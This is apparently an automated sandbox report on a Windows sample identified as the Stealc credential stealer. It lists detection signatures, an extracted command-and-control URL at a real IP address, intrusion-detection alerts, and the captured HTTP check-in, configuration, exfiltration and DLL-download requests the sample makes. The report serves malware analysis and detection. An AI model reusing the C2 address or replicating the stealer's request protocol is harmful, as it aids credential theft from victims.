Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1502494
MD5:69a44afd5f25f695f1e1fe16abf56a39
SHA1:16db1181ec4d54a1fe2aed1f25a0bd47d53cee72
SHA256:7f7ab62446251c1fec500e70705d6840c982351dfd8303e0ca5ddf0e40c2f6fc
Tags:exe
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Downloads executable code via HTTP
Entry point lies outside standard sections
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 2800 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 69A44AFD5F25F695F1E1FE16ABF56A39)
    • WerFault.exe (PID: 1908 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 1544 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2544618204.00000000008CA000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        Process Memory Space: file.exe PID: 2800JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: file.exe PID: 2800JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: file.exe PID: 2800JoeSecurity_StealcYara detected StealcJoe Security
              No Sigma rule has matched
              Timestamp:2024-09-01T23:02:56.268443+0200
              SID:2044246
              Severity:1
              Source Port:49730
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-09-01T23:02:55.982267+0200
              SID:2044244
              Severity:1
              Source Port:49730
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-09-01T23:02:58.882814+0200
              SID:2044248
              Severity:1
              Source Port:49730
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-09-01T23:02:55.988260+0200
              SID:2044245
              Severity:1
              Source Port:80
              Destination Port:49730
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-09-01T23:02:55.694309+0200
              SID:2044243
              Severity:1
              Source Port:49730
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-09-01T23:02:56.275329+0200
              SID:2044247
              Severity:1
              Source Port:80
              Destination Port:49730
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-09-01T23:02:59.442106+0200
              SID:2803304
              Severity:3
              Source Port:49730
              Destination Port:80
              Protocol:TCP
              Classtype:Unknown Traffic

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: http://185.215.113.100/e2b1563c6670f193.phpURL Reputation: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpURL Reputation: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dllURL Reputation: Label: malware
              Source: http://185.215.113.100URL Reputation: Label: malware
              Source: http://185.215.113.100/URL Reputation: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpiAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dllk.Avira URL Cloud: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dllKAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpoAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpUAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpion:Avira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpserAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.php9Avira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpinit.exeAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dll1563c6670f193.php1_Avira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.php&Avira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpfAvira URL Cloud: Label: malware
              Source: 00000000.00000002.2544618204.00000000008CA000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}
              Source: http://185.215.113.100/e2b1563c6670f193.phpoVirustotal: Detection: 7%Perma Link
              Source: http://185.215.113.100/e2b1563c6670f193.phpiVirustotal: Detection: 8%Perma Link
              Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dllKVirustotal: Detection: 10%Perma Link
              Source: http://185.215.113.100/e2b1563c6670f193.phpion:Virustotal: Detection: 6%Perma Link
              Source: http://185.215.113.100/e2b1563c6670f193.phpserVirustotal: Detection: 17%Perma Link
              Source: http://185.215.113.100/e2b1563c6670f193.phpUVirustotal: Detection: 10%Perma Link
              Source: http://185.215.113.100/e2b1563c6670f193.phpinit.exeVirustotal: Detection: 17%Perma Link
              Source: http://185.215.113.100/e2b1563c6670f193.php9Virustotal: Detection: 7%Perma Link
              Source: http://185.215.113.100/e2b1563c6670f193.php&Virustotal: Detection: 8%Perma Link
              Source: http://185.215.113.100/e2b1563c6670f193.phpfVirustotal: Detection: 7%Perma Link
              Source: http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZVirustotal: Detection: 15%Perma Link
              Source: file.exeReversingLabs: Detection: 36%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: file.exeJoe Sandbox ML: detected
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.100:80
              Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.100:80
              Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.100:80 -> 192.168.2.4:49730
              Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.100:80
              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.100:80 -> 192.168.2.4:49730
              Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.100:80
              Source: Malware configuration extractorURLs: http://185.215.113.100/e2b1563c6670f193.php
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 21:02:59 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBKHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 44 31 42 43 38 36 46 36 37 31 33 36 30 34 32 39 36 32 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 2d 2d 0d 0a Data Ascii: ------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="hwid"7BD1BC86F6713604296297------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="build"leva------JKEGHDGHCGHDHJKFBFBK--
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCFBAEGDHIEBFHDGCBHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 38 39 37 64 38 39 36 32 36 61 35 38 33 63 31 30 33 64 65 33 64 35 39 37 34 62 62 35 62 61 32 30 36 34 32 63 66 31 32 64 31 37 64 37 32 33 62 36 30 37 34 39 38 64 30 65 39 38 36 35 34 32 37 35 33 61 38 32 37 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 2d 2d 0d 0a Data Ascii: ------BAFCFBAEGDHIEBFHDGCBContent-Disposition: form-data; name="token"36897d89626a583c103de3d5974bb5ba20642cf12d17d723b607498d0e986542753a8275------BAFCFBAEGDHIEBFHDGCBContent-Disposition: form-data; name="message"browsers------BAFCFBAEGDHIEBFHDGCB--
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJHost: 185.215.113.100Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 38 39 37 64 38 39 36 32 36 61 35 38 33 63 31 30 33 64 65 33 64 35 39 37 34 62 62 35 62 61 32 30 36 34 32 63 66 31 32 64 31 37 64 37 32 33 62 36 30 37 34 39 38 64 30 65 39 38 36 35 34 32 37 35 33 61 38 32 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 2d 2d 0d 0a Data Ascii: ------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="token"36897d89626a583c103de3d5974bb5ba20642cf12d17d723b607498d0e986542753a8275------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="message"plugins------KKFCFBKFCFBFIDGCGDHJ--
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFIIHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 38 39 37 64 38 39 36 32 36 61 35 38 33 63 31 30 33 64 65 33 64 35 39 37 34 62 62 35 62 61 32 30 36 34 32 63 66 31 32 64 31 37 64 37 32 33 62 36 30 37 34 39 38 64 30 65 39 38 36 35 34 32 37 35 33 61 38 32 37 35 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 2d 2d 0d 0a Data Ascii: ------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="token"36897d89626a583c103de3d5974bb5ba20642cf12d17d723b607498d0e986542753a8275------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="message"fplugins------FIEGCBKEGCFCBFIDBFII--
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBGHost: 185.215.113.100Content-Length: 5727Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 185.215.113.100 185.215.113.100
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 185.215.113.100:80
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.100
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBKHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 44 31 42 43 38 36 46 36 37 31 33 36 30 34 32 39 36 32 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 2d 2d 0d 0a Data Ascii: ------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="hwid"7BD1BC86F6713604296297------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="build"leva------JKEGHDGHCGHDHJKFBFBK--
              Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.1
              Source: file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.0000000000861000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100
              Source: file.exe, 00000000.00000002.2545709966.00000000013C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/
              Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2544618204.00000000008CA000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dll
              Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dll1563c6670f193.php1_
              Source: file.exe, 00000000.00000002.2545709966.00000000013C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dllK
              Source: file.exe, 00000000.00000002.2545709966.00000000013C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dllk.
              Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2545709966.00000000013B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2544618204.00000000008CA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.0000000000861000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php
              Source: file.exe, 00000000.00000002.2545709966.00000000013C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php&
              Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php9
              Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpU
              Source: file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ
              Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpf
              Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpi
              Source: file.exe, 00000000.00000002.2544618204.0000000000861000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpinit.exe
